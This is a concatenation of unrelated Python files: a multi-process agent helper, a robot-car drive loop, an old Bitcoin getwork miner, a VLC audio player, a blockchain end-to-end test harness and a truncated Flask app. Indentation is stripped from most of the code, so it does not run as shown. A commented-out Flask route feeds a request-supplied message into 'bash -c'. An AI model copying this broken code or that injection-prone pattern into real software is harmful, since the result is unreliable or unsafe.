_workspace = _SplitSharedWorkspace(workspace, self.batch_dims[k])
self.agents[k]._asynchronous_call(_workspace, **kwargs)
def is_running(self):
for a in self.agents:
if a.is_running():
return True
return False
def train(self, f=True):
for a in self.agents:
a.train(f)
def eval(self):
for a in self.agents:
a.eval()
def close(self):
for a in self.agents:
a.close()
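# A hedged usage sketch (illustration only; `my_agent` stands for any salina
# Agent): create four remote copies, run them once over the shared workspace,
# then shut the processes down.
def _nremote_agent_example(my_agent):
    n_agents, workspace = NRemoteAgent.create(my_agent, num_processes=4)
    n_agents.seed(123)
    n_agents(workspace)  # blocking call dispatched across all processes
    n_agents.close()
    return workspace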
|
vehicle.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 10:44:24 2017
@author: wroscoe
"""
import time
from statistics import median
from threading import Thread
from .memory import Memory
from prettytable import PrettyTable
class PartProfiler:
def __init__(self):
self.records = {}
def profile_part(self, p):
self.records[p] = { "times" : [] }
def on_part_start(self, p):
self.records[p]['times'].append(time.time())
def on_part_finished(self, p):
now = time.time()
prev = self.records[p]['times'][-1]
delta = now - prev
thresh = 0.000001
if delta < thresh or delta > 100000.0:
delta = thresh
self.records[p]['times'][-1] = delta
def report(self):
print("Part Profile Summary: (times in ms)")
pt = PrettyTable()
pt.field_names = ["part", "max", "min", "avg", "median"]
for p, val in self.records.items():
# remove first and last entry because there could be one-off
# time spent in initialisations, and the latest diff could be
# incomplete because of user keyboard interrupt
arr = val['times'][1:-1]
if len(arr) == 0:
continue
pt.add_row([p.__class__.__name__,
"%.2f" % (max(arr) * 1000),
"%.2f" % (min(arr) * 1000),
"%.2f" % (sum(arr) / len(arr) * 1000),
"%.2f" % (median(arr) * 1000)])
print(pt)
class Vehicle:
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = []
self.on = True
self.threads = []
self.profiler = PartProfiler()
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
inputs : list
Channel names to get from memory.
outputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
run_condition : str
Name of a boolean channel in memory; the part only runs when that value is True.
"""
assert type(inputs) is list, "inputs is not a list: %r" % inputs
assert type(outputs) is list, "outputs is not a list: %r" % outputs
assert type(threaded) is bool, "threaded is not a boolean: %r" % threaded
p = part
print('Adding part {}.'.format(p.__class__.__name__))
entry = {}
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
self.profiler.profile_part(part)
def remove(self, part):
"""
remove part from list
"""
self.parts.remove(part)
def start(self, rate_hz=10, max_loop_count=None, verbose=False):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
threads for the threaded parts then starts an infinite loop
that runs each part and updates the memory.
Parameters
----------
rate_hz : int
The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int
Maximum number of loops the drive loop should execute. This is
used for testing that all the parts of the vehicle work.
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
# start the update thread
entry.get('thread').start()
# wait until the parts warm up.
print('Starting vehicle...')
loop_count = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
# stop drive loop if loop_count exceeds max_loop_count
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
else:
# print a message when could not maintain loop rate.
if verbose:
print('WARN::Vehicle: jitter violation in vehicle loop '
'with {0:4.0f}ms'.format(abs(1000 * sleep_time)))
if verbose and loop_count % 200 == 0:
self.profiler.report()
except KeyboardInterrupt:
pass
finally:
self.stop()
def update_parts(self):
'''
loop over all parts
'''
for entry in self.parts:
run = True
# check run condition, if it exists
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
if run:
# get part
p = entry['part']
# start timing part run
self.profiler.on_part_start(p)
# get inputs from memory
inputs = self.mem.get(entry['inputs'])
# run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
# save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
# finish timing part run
self.profiler.on_part_finished(p)
def stop(self):
print('Shutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except AttributeError:
# usually from missing shutdown method, which should be optional
pass
except Exception as e:
print(e)
self.profiler.report()
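# A minimal sketch of wiring a part into the drive loop (the part below is
# hypothetical and only illustrates the run()/outputs contract).
def _vehicle_example():
    class ConstantThrottle:
        def run(self):
            return 0.3  # written to the 'throttle' channel on every loop

    v = Vehicle()
    v.add(ConstantThrottle(), outputs=['throttle'])
    v.start(rate_hz=20, max_loop_count=100)  # run 100 loops, then stop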
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 11084
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
run.py
|
import pafy
import vlc
import time
import multiprocessing
from datawatts import datassette
from datawatts import watts
from datawatts import menu
wattsurl = next(watts.get_url())[1]
dataurl = next(datassette.get_url())
dataname = dataurl[0].split(':')[1].strip()
dataurl = dataurl[1]
video = pafy.new(wattsurl)
best = video.getbest()
wattsurl = best.url
def playurl(url, volume=90):
instance = vlc.Instance('--input-repeat=-1 --novideo --quiet')
# Define VLC player
player = instance.media_player_new()
# Define VLC media
media = instance.media_new(url)
# Set player media
player.set_media(media)
player.audio_set_volume(volume)
# Play the media
try:
player.play()
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
def main():
p1 = multiprocessing.Process(target=playurl, args=(dataurl, 45))
p2 = multiprocessing.Process(target=playurl, args=(wattsurl, 70))
try:
p1.start()
p2.start()
menu.main_menu(dataname=dataname)
except KeyboardInterrupt:
pass
finally:
p1.join()
p2.join()
if __name__ == '__main__':
main()
|
run_end_to_end_test.py
|
#!/usr/bin/env python3
#
# end to end tests of fetch-ledger
#
# This is achieved by using available fetch APIs to spin up a network locally
# and test it can handle certain conditions (such as single or multiple
# node failure)
import sys
import os
import argparse
import yaml
import io
import random
import datetime
import importlib
import time
import threading
import glob
import shutil
import traceback
import time
import pickle
import codecs
import subprocess
from threading import Event
from pathlib import Path
from fetch.cluster.instance import ConstellationInstance
from fetchai.ledger.api import LedgerApi
from fetchai.ledger.crypto import Entity
def output(*args):
text = ' '.join(map(str, args))
if text != '':
sys.stdout.write(text)
sys.stdout.write('\n')
sys.stdout.flush()
class TimerWatchdog():
"""
TimerWatchdog allows the user to specify a callback that will
be executed after a set amount of time, unless the watchdog
is stopped. This lets you dictate the length of tests.
"""
def __init__(self, time, name, task, callback):
self._time = time
self._name = name
self._task = task
self._callback = callback
self._stop_event = Event()
self._stop_event.clear()
def start(self):
self._thread = threading.Thread(target=self._sleep)
self._thread.start()
def _sleep(self):
# This will return false iff the stop event isn't set before the
# timeout
if not self._stop_event.wait(self._time):
output(
"Watchdog '{}' awoke before being stopped! Awoke after: {}s . Watchdog will now: {}".format(
self._name,
self._time,
self._task))
self.trigger()
else:
output("Watchdog safely stopped")
# Notify the waiting thread - this causes it not to trigger.
def stop(self):
self._stop_event.set()
def trigger(self):
self._callback()
def __del__(self):
self.stop()
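# A short usage sketch of TimerWatchdog (illustrative only; the callback just
# logs). The callback fires only if stop() is not called within `time` seconds.
def _timer_watchdog_example():
    watchdog = TimerWatchdog(
        time=30,
        name="example-test",
        task="abort the example run",
        callback=lambda: output("watchdog fired"))
    watchdog.start()
    # ... run the actual test here ...
    watchdog.stop()  # reached in time, so the callback never fires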
class TestInstance():
"""
Sets up an instance of a test, containing references to started nodes and other relevant data
"""
def __init__(self, build_directory, constellation_exe, yaml_file):
self._number_of_nodes = 0
self._node_load_directory = []
self._node_connections = None
self._nodes_are_mining = []
self._port_start_range = 8000
self._port_range = 20
self._workspace = ""
self._lanes = 1
self._slices = 16
self._max_test_time = 1000
self._nodes = []
self._metadata = None
self._watchdog = None
self._creation_time = time.perf_counter()
self._block_interval = 1000
# Variables related to temporary pos mode
self._pos_mode = False
self._nodes_pubkeys = []
# Default to removing old tests
for f in glob.glob(build_directory + "/end_to_end_test_*"):
shutil.rmtree(f)
# To avoid possible collisions, prepend output files with the date
self._random_identifer = '{0:%Y_%m_%d_%H_%M_%S}'.format(
datetime.datetime.now())
self._random_identifer = "default"
self._workspace = os.path.join(
build_directory, 'end_to_end_test_{}'.format(
self._random_identifer))
self._build_directory = build_directory
self._constellation_exe = os.path.abspath(constellation_exe)
self._yaml_file = os.path.abspath(yaml_file)
self._test_files_dir = os.path.dirname(self._yaml_file)
verify_file(constellation_exe)
verify_file(self._yaml_file)
# Ensure that build/end_to_end_output_XXX/ exists for the test output
os.makedirs(self._workspace, exist_ok=True)
def append_node(self, index, load_directory=None):
# Create a folder for the node to write logs to etc.
root = os.path.abspath(os.path.join(
self._workspace, 'node{}'.format(index)))
# ensure the workspace folder exists
os.makedirs(root, exist_ok=True)
if load_directory and index in load_directory:
load_from = self._test_files_dir + \
"/nodes_saved/" + load_directory[index]
files = os.listdir(load_from)
for f in files:
shutil.copy(load_from + f, root)
port = self._port_start_range + (self._port_range * index)
# Create an instance of the constellation - note we don't clear path since
# it should be clear unless load_directory is used
instance = ConstellationInstance(
self._constellation_exe,
port,
root,
clear_path=False
)
# Possibly soon to be deprecated functionality - set the block interval
instance.block_interval = self._block_interval
instance.feature_flags = ['synergetic']
# configure the lanes and slices
instance.lanes = self._lanes
instance.slices = self._slices
assert len(self._nodes) == index, "Attempt to add node with an index mismatch. Current len: {}, index: {}".format(
len(self._nodes), index)
self._nodes.append(instance)
def connect_nodes(self, node_connections):
for connect_from, connect_to in node_connections:
self._nodes[connect_from].add_peer(self._nodes[connect_to])
output("Connect node {} to {}".format(connect_from, connect_to))
def start_node(self, index):
print('Starting Node {}...'.format(index))
self._nodes[index].start()
print('Starting Node {}...complete'.format(index))
time.sleep(1)
def setup_pos_for_nodes(self):
# Path to config files
expected_ouptut_dir = os.path.abspath(
os.path.dirname(self._yaml_file)+"/input_files")
# Create required files for this test
file_gen = os.path.abspath(
"./scripts/end_to_end_test/input_files/create-input-files.py")
verify_file(file_gen)
exit_code = subprocess.call([file_gen, str(self._number_of_nodes)])
infofile = expected_ouptut_dir+"/info.txt"
# Required files for this operation
verify_file(infofile)
# infofile specifies the address of each numbered key
all_lines_in_file = open(infofile, "r").readlines()
nodes_mining_identities = []
# First give each node that is mining a unique identity
for index in range(self._number_of_nodes):
# max 200 mining nodes due to consensus requirements
assert(index <= 200)
node = self._nodes[index]
if(node.mining):
node_key = all_lines_in_file[index].strip().split()[-1]
print('Setting up POS for node {}...'.format(index))
print('Giving node the identity: {}'.format(node_key))
nodes_mining_identities.append(node_key)
key_path = expected_ouptut_dir+"/{}.key".format(index)
verify_file(key_path)
# Copy the keyfile from its location to the node's cwd
shutil.copy(key_path, node.root+"/p2p.key")
stake_gen = os.path.abspath("./scripts/generate-genesis-file.py")
verify_file(stake_gen)
# Create a stake file into the logging directory for all nodes
# Importantly, set the time to start
genesis_file_location = self._workspace+"/genesis_file.json"
cmd = [stake_gen, *nodes_mining_identities,
"-o", genesis_file_location, "-w", "10"]
# After giving the relevant nodes identities, make a stake file
exit_code = subprocess.call(cmd)
# Give all nodes this stake file, plus append POS flag for when node starts
for index in range(self._number_of_nodes):
shutil.copy(genesis_file_location, self._nodes[index].root)
self._nodes[index].append_to_cmd(["-pos", "-private-network", ])
def restart_node(self, index):
print('Restarting Node {}...'.format(index))
self._nodes[index].stop()
# Optionally remove db files when testing recovery from a genesis file
if False:
self.dump_debug(index)
pattern = ["*.db"]
for p in pattern:
[os.remove(x) for x in glob.iglob('./**/' + p, recursive=True)]
self.start_node(index)
time.sleep(3)
def print_time_elapsed(self):
output("Elapsed time: {}".format(
time.perf_counter() - self._creation_time))
def run(self):
# build up all the node instances
for index in range(self._number_of_nodes):
self.append_node(index, self._node_load_directory)
# Now connect the nodes as specified
if self._node_connections:
self.connect_nodes(self._node_connections)
# Enable mining node(s)
for miner_index in self._nodes_are_mining:
self._nodes[miner_index].mining = True
# If there is only one node and it is mining, it runs in standalone mode
if(len(self._nodes) == 1 and len(self._nodes_are_mining) > 0):
self._nodes[0].standalone = True
else:
for node in self._nodes:
node.private_network = True
# Temporary special case for POS mode
if(self._pos_mode):
self.setup_pos_for_nodes()
# start all the nodes
for index in range(self._number_of_nodes):
if self._number_of_nodes > 1 and not self._pos_mode:
self._nodes[index].append_to_cmd(["-private-network", ])
self.start_node(index)
time.sleep(5) # TODO(HUT): blocking http call to node for ready state
if(self._pos_mode):
output("POS mode. sleep extra time.")
time.sleep(5)
def stop(self):
if self._nodes:
for n, node in enumerate(self._nodes):
print('Stopping Node {}...'.format(n))
if(node):
node.stop()
print('Stopping Node {}...complete'.format(n))
if self._watchdog:
self._watchdog.stop()
# If something goes wrong, print out debug state (mainly node log files)
def dump_debug(self, only_node=None):
if self._nodes:
for n, node in enumerate(self._nodes):
if only_node is not None and n != only_node:
continue
print('\nNode debug. Node:{}'.format(n))
node_log_path = node.log_path
if not os.path.isfile(node_log_path):
output("Couldn't find supposed node log file: {}".format(
node_log_path))
else:
# Send raw bytes directly to stdout since it contains
# non-ascii
data = Path(node_log_path).read_bytes()
sys.stdout.buffer.write(data)
sys.stdout.flush()
def verify_file(filename):
if not os.path.isfile(filename):
output("Couldn't find expected file: {}".format(filename))
sys.exit(1)
def extract(test, key, expected=True, expect_type=None, default=None):
"""
Convenience function to read a key from a parsed YAML test definition, checking the type you expect to find
"""
if key in test:
result = test[key]
if expect_type is not None and not isinstance(result, expect_type):
output(
"Failed to get expected type from YAML! Key: {} YAML: {}".format(
key, test))
output("Note: expected type: {} got: {}".format(
expect_type, type(result)))
sys.exit(1)
return result
else:
if expected:
output(
"Failed to find key in YAML! \nKey: {} \nYAML: {}".format(
key, test))
sys.exit(1)
else:
return default
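# Illustrative sketch of extract() on a made-up YAML fragment: present keys are
# type-checked and returned, and optional missing keys fall back to the default.
def _extract_example():
    test_yaml = {'test_name': 'basic', 'number_of_nodes': 2}
    name = extract(test_yaml, 'test_name', expected=True, expect_type=str)          # 'basic'
    nodes = extract(test_yaml, 'number_of_nodes', expected=True, expect_type=int)   # 2
    miners = extract(test_yaml, 'mining_nodes', expected=False, expect_type=list, default=[])
    return name, nodes, miners  # ('basic', 2, [])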
def setup_test(test_yaml, test_instance):
output("Setting up test: {}".format(test_yaml))
test_name = extract(test_yaml, 'test_name', expected=True, expect_type=str)
number_of_nodes = extract(
test_yaml, 'number_of_nodes', expected=True, expect_type=int)
node_load_directory = extract(
test_yaml, 'node_load_directory', expected=False, expect_type=dict)
node_connections = extract(
test_yaml, 'node_connections', expected=False, expect_type=list)
mining_nodes = extract(test_yaml, 'mining_nodes',
expected=False, expect_type=list, default=[])
max_test_time = extract(test_yaml, 'max_test_time',
expected=False, expect_type=int, default=10)
pos_mode = extract(test_yaml, 'pos_mode', expected=False,
expect_type=bool, default=False)
test_instance._number_of_nodes = number_of_nodes
test_instance._node_load_directory = node_load_directory
test_instance._node_connections = node_connections
test_instance._nodes_are_mining = mining_nodes
test_instance._max_test_time = max_test_time
test_instance._pos_mode = pos_mode
# Watchdog will trigger this if the tests exceeds allowed bounds. Note stopping the test cleanly is
# necessary to preserve output logs etc.
def clean_shutdown():
output(
"***** Shutting down test due to failure!. Debug YAML: {} *****\n".format(test_yaml))
test_instance.stop()
# test_instance.dump_debug()
os._exit(1)
watchdog = TimerWatchdog(
time=max_test_time,
name=test_name,
task="End test and cleanup",
callback=clean_shutdown)
watchdog.start()
test_instance._watchdog = watchdog
# This shouldn't take a long time since nodes are started asynchronously
test_instance.run()
def send_txs(parameters, test_instance):
name = parameters["name"]
amount = parameters["amount"]
nodes = parameters["nodes"]
if len(nodes) != 1:
output("Only one node supported for sending TXs to at this time!")
sys.exit(1)
# Create or load the identities up front
identities = []
if "load_from_file" in parameters and parameters["load_from_file"] == True:
filename = "{}/identities_pickled/{}.pickle".format(
test_instance._test_files_dir, name)
verify_file(filename)
with open(filename, 'rb') as handle:
identities = pickle.load(handle)
else:
identities = [Entity() for i in range(amount)]
# If pickling, save this to the workspace
with open('{}/{}.pickle'.format(test_instance._workspace, name), 'wb') as handle:
pickle.dump(identities, handle)
for node_index in nodes:
node_host = "localhost"
node_port = test_instance._nodes[node_index]._port_start
# create the API objects we use to interface with the nodes
api = LedgerApi(node_host, node_port)
tx_and_identity = []
for index in range(amount):
# get next identity
identity = identities[index]
# create and send the transaction to the ledger, capturing the tx
# hash
tx = api.tokens.wealth(identity, index)
tx_and_identity.append((tx, identity, index))
output("Created wealth with balance: ", index)
# Attach this to the test instance so it can be used for verification
test_instance._metadata = tx_and_identity
# Save the metatada too
with open('{}/{}_meta.pickle'.format(test_instance._workspace, name), 'wb') as handle:
pickle.dump(test_instance._metadata, handle)
def run_python_test(parameters, test_instance):
host = parameters.get('host', 'localhost')
port = parameters.get('port', test_instance._nodes[0]._port_start)
test_script = importlib.import_module(
parameters['script'], 'end_to_end_test')
test_script.run({
'host': host,
'port': port
})
def verify_txs(parameters, test_instance):
name = parameters["name"]
nodes = parameters["nodes"]
expect_mined = parameters.get("expect_mined", False)
# Currently assume there only one set of TXs
tx_and_identity = test_instance._metadata
# Load these from file if specified
if "load_from_file" in parameters and parameters["load_from_file"] == True:
filename = "{}/identities_pickled/{}_meta.pickle".format(
test_instance._test_files_dir, name)
verify_file(filename)
with open(filename, 'rb') as handle:
tx_and_identity = pickle.load(handle)
for node_index in nodes:
node_host = "localhost"
node_port = test_instance._nodes[node_index]._port_start
api = LedgerApi(node_host, node_port)
# Verify TXs - will block until they have executed
for tx, identity, balance in tx_and_identity:
error_message = ""
# Check TX has executed, unless we expect it should already have been mined
while True:
status = api.tx.status(tx)
if status == "Executed" or expect_mined:
output("found executed TX")
error_message = ""
break
tx_b64 = codecs.encode(codecs.decode(
tx, 'hex'), 'base64').decode()
next_error_message = "Waiting for TX to get executed (node {}). Found: {} Tx: {}".format(
node_index, status, tx_b64)
time.sleep(0.5)
if next_error_message != error_message:
output(next_error_message)
error_message = next_error_message
failed_to_find = 0
while True:
seen_balance = api.tokens.balance(identity)
# There is an unavoidable race that can cause you to see a balance of 0
# since the TX can be lost even after supposedly being executed.
if seen_balance == 0 and balance != 0:
output(
f"Note: found a balance of 0 when expecting {balance}. Retrying.")
time.sleep(1)
failed_to_find = failed_to_find + 1
if failed_to_find > 5:
# Forces the resubmission of wealth TX to the chain (TX most likely was lost)
api.tokens.wealth(identity, balance)
failed_to_find = 0
else:
# Non-zero balance at this point. Stop waiting.
if balance != seen_balance:
output(
"Balance mismatch found after sending to node. Found {} expected {}".format(
seen_balance, balance))
test_instance._watchdog.trigger()
break
output("Verified a wealth of {}".format(seen_balance))
output("Verified balances for node: {}".format(node_index))
def get_nodes_private_key(test_instance, index):
# Path to config files (should already be generated)
expected_ouptut_dir = os.path.abspath(
os.path.dirname(test_instance._yaml_file)+"/input_files")
key_path = expected_ouptut_dir+"/{}.key".format(index)
verify_file(key_path)
private_key = open(key_path, "rb").read(32)
return private_key
def destake(parameters, test_instance):
nodes = parameters["nodes"]
for node_index in nodes:
node_host = "localhost"
node_port = test_instance._nodes[node_index]._port_start
# create the API objects we use to interface with the nodes
api = LedgerApi(node_host, node_port)
# create the entity from the node's private key
entity = Entity(get_nodes_private_key(test_instance, node_index))
current_stake = api.tokens.stake(entity)
output(f'Destaking node {node_index}. Current stake: ', current_stake)
output(
f'Destaking node {node_index}. Current balance: ', api.tokens.balance(entity))
api.sync(api.tokens.add_stake(entity, 1, 500))
api.sync(api.tokens.de_stake(entity, current_stake, 500))
api.sync(api.tokens.collect_stake(entity, 500))
output(f'Destaked node {node_index}. Current stake: ', current_stake)
output(
f'Destaked node {node_index}. Current balance: ', api.tokens.balance(entity))
output(f'Destaked node {node_index}. Current cooldown stake: ',
api.tokens.stake_cooldown(entity))
def restart_nodes(parameters, test_instance):
nodes = parameters["nodes"]
for node_index in nodes:
test_instance.restart_node(node_index)
time.sleep(5)
def add_node(parameters, test_instance):
index = parameters["index"]
node_connections = parameters["node_connections"]
test_instance.append_node(index)
test_instance.connect_nodes(node_connections)
test_instance.start_node(index)
def run_steps(test_yaml, test_instance):
output("Running steps: {}".format(test_yaml))
for step in test_yaml:
output("Running step: {}".format(step))
command = ""
parameters = ""
if isinstance(step, dict):
command = list(step.keys())[0]
parameters = step[command]
elif isinstance(step, str):
command = step
else:
raise RuntimeError(
"Failed to parse command from step: {}".format(step))
if command == 'send_txs':
send_txs(parameters, test_instance)
elif command == 'verify_txs':
verify_txs(parameters, test_instance)
elif command == 'add_node':
add_node(parameters, test_instance)
elif command == 'sleep':
time.sleep(parameters)
elif command == 'print_time_elapsed':
test_instance.print_time_elapsed()
elif command == 'run_python_test':
run_python_test(parameters, test_instance)
elif command == 'restart_nodes':
restart_nodes(parameters, test_instance)
elif command == 'destake':
destake(parameters, test_instance)
else:
output(
"Found unknown command when running steps: '{}'".format(
command))
sys.exit(1)
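# A minimal usage sketch (not part of the harness itself): run_steps() accepts a
# list in which each step is either a bare string command or a one-key dict
# mapping the command name onto its parameters. The node indices and sleep
# duration below are hypothetical; the parameter shapes mirror the handlers
# defined above (restart_nodes, destake, sleep, print_time_elapsed).
def _example_run_steps_usage(test_instance):
    example_steps = [
        {'restart_nodes': {'nodes': [0]}},  # restart node 0 (sleeps 5s after)
        {'sleep': 5},                       # pause the test for 5 seconds
        'print_time_elapsed',               # bare string command, no parameters
        {'destake': {'nodes': [1]}},        # walk node 1 through de-staking
    ]
    run_steps(example_steps, test_instance)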
def run_test(build_directory, yaml_file, constellation_exe):
# Read YAML file
with open(yaml_file, 'r') as stream:
try:
all_yaml = yaml.safe_load_all(stream)
# Parse yaml documents as tests (sequentially)
for test in all_yaml:
# Create a new test instance
description = extract(test, 'test_description')
output("\n=================================================")
output("Test: {}".format(description))
output("=================================================\n")
if "DISABLED" in description:
output("Skipping disabled test")
continue
# Create a test instance
test_instance = TestInstance(
build_directory, constellation_exe, yaml_file)
# Configure the test - this will start the nodes asynchronously
setup_test(extract(test, 'setup_conditions'), test_instance)
# Run the steps in the test
run_steps(extract(test, 'steps'), test_instance)
test_instance.stop()
except Exception as e:
print('Failed to parse yaml or to run test! Error: "{}"'.format(e))
traceback.print_exc()
test_instance.stop()
# test_instance.dump_debug()
sys.exit(1)
output("\nAll end to end tests have passed")
def parse_commandline():
parser = argparse.ArgumentParser(
description='High-level end-to-end test runner: reads a YAML file and runs the tests within. Returns 1 if a test fails')
# Required argument
parser.add_argument(
'build_directory', type=str,
help='Location of the build directory relative to current path')
parser.add_argument(
'constellation_exe', type=str,
help='Location of the constellation binary relative to current path')
parser.add_argument('yaml_file', type=str,
help='Location of the yaml file dictating the tests')
return parser.parse_args()
def main():
args = parse_commandline()
return run_test(args.build_directory, args.yaml_file,
args.constellation_exe)
if __name__ == '__main__':
main()
|
app.py
|
import json
import logging
import subprocess
import os
import sys
import urllib.parse
from flask import abort, Flask, jsonify, request, Response
from flask_cors import CORS, cross_origin
from logging.config import dictConfig
from threading import Thread
dictConfig({
'version': 1,
'formatters': {'default': {
'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s',
}},
'handlers': {'wsgi': {
'class': 'logging.StreamHandler',
'stream': 'ext://flask.logging.wsgi_errors_stream',
'formatter': 'default'
}},
'root': {
'level': 'DEBUG',
'handlers': ['wsgi']
}
})
app = Flask(__name__)
cors = CORS(app)
# app.config['CORS_HEADERS'] = 'Content-Type'
@app.route('/')
def root():
return 'ok'
@app.route('/_ok')
def healthcheck():
return 'ok'
## TODO is POST supported by jupyter-server-proxy
# @app.route('/autocommit', methods=['POST'])
# def autocommit():
# os.chdir('/home/jovyan')
# subprocess.call(['./autocommit.sh'])
# return 'ok'
# @app.route('/merge', methods=['POST'])
# def merge():
# data = request.json()
# commit_message = data['commit_message']
# app.logger.info('/merge called with commit message: %s', commit_message)
# subprocess.Popen(['/bin/bash', '-i', '-c', '/home/jovyan/merge.sh', '"{}"'.format(commit_message)],
# cwd='/home/jovyan',
# stdout=subprocess.PIPE,
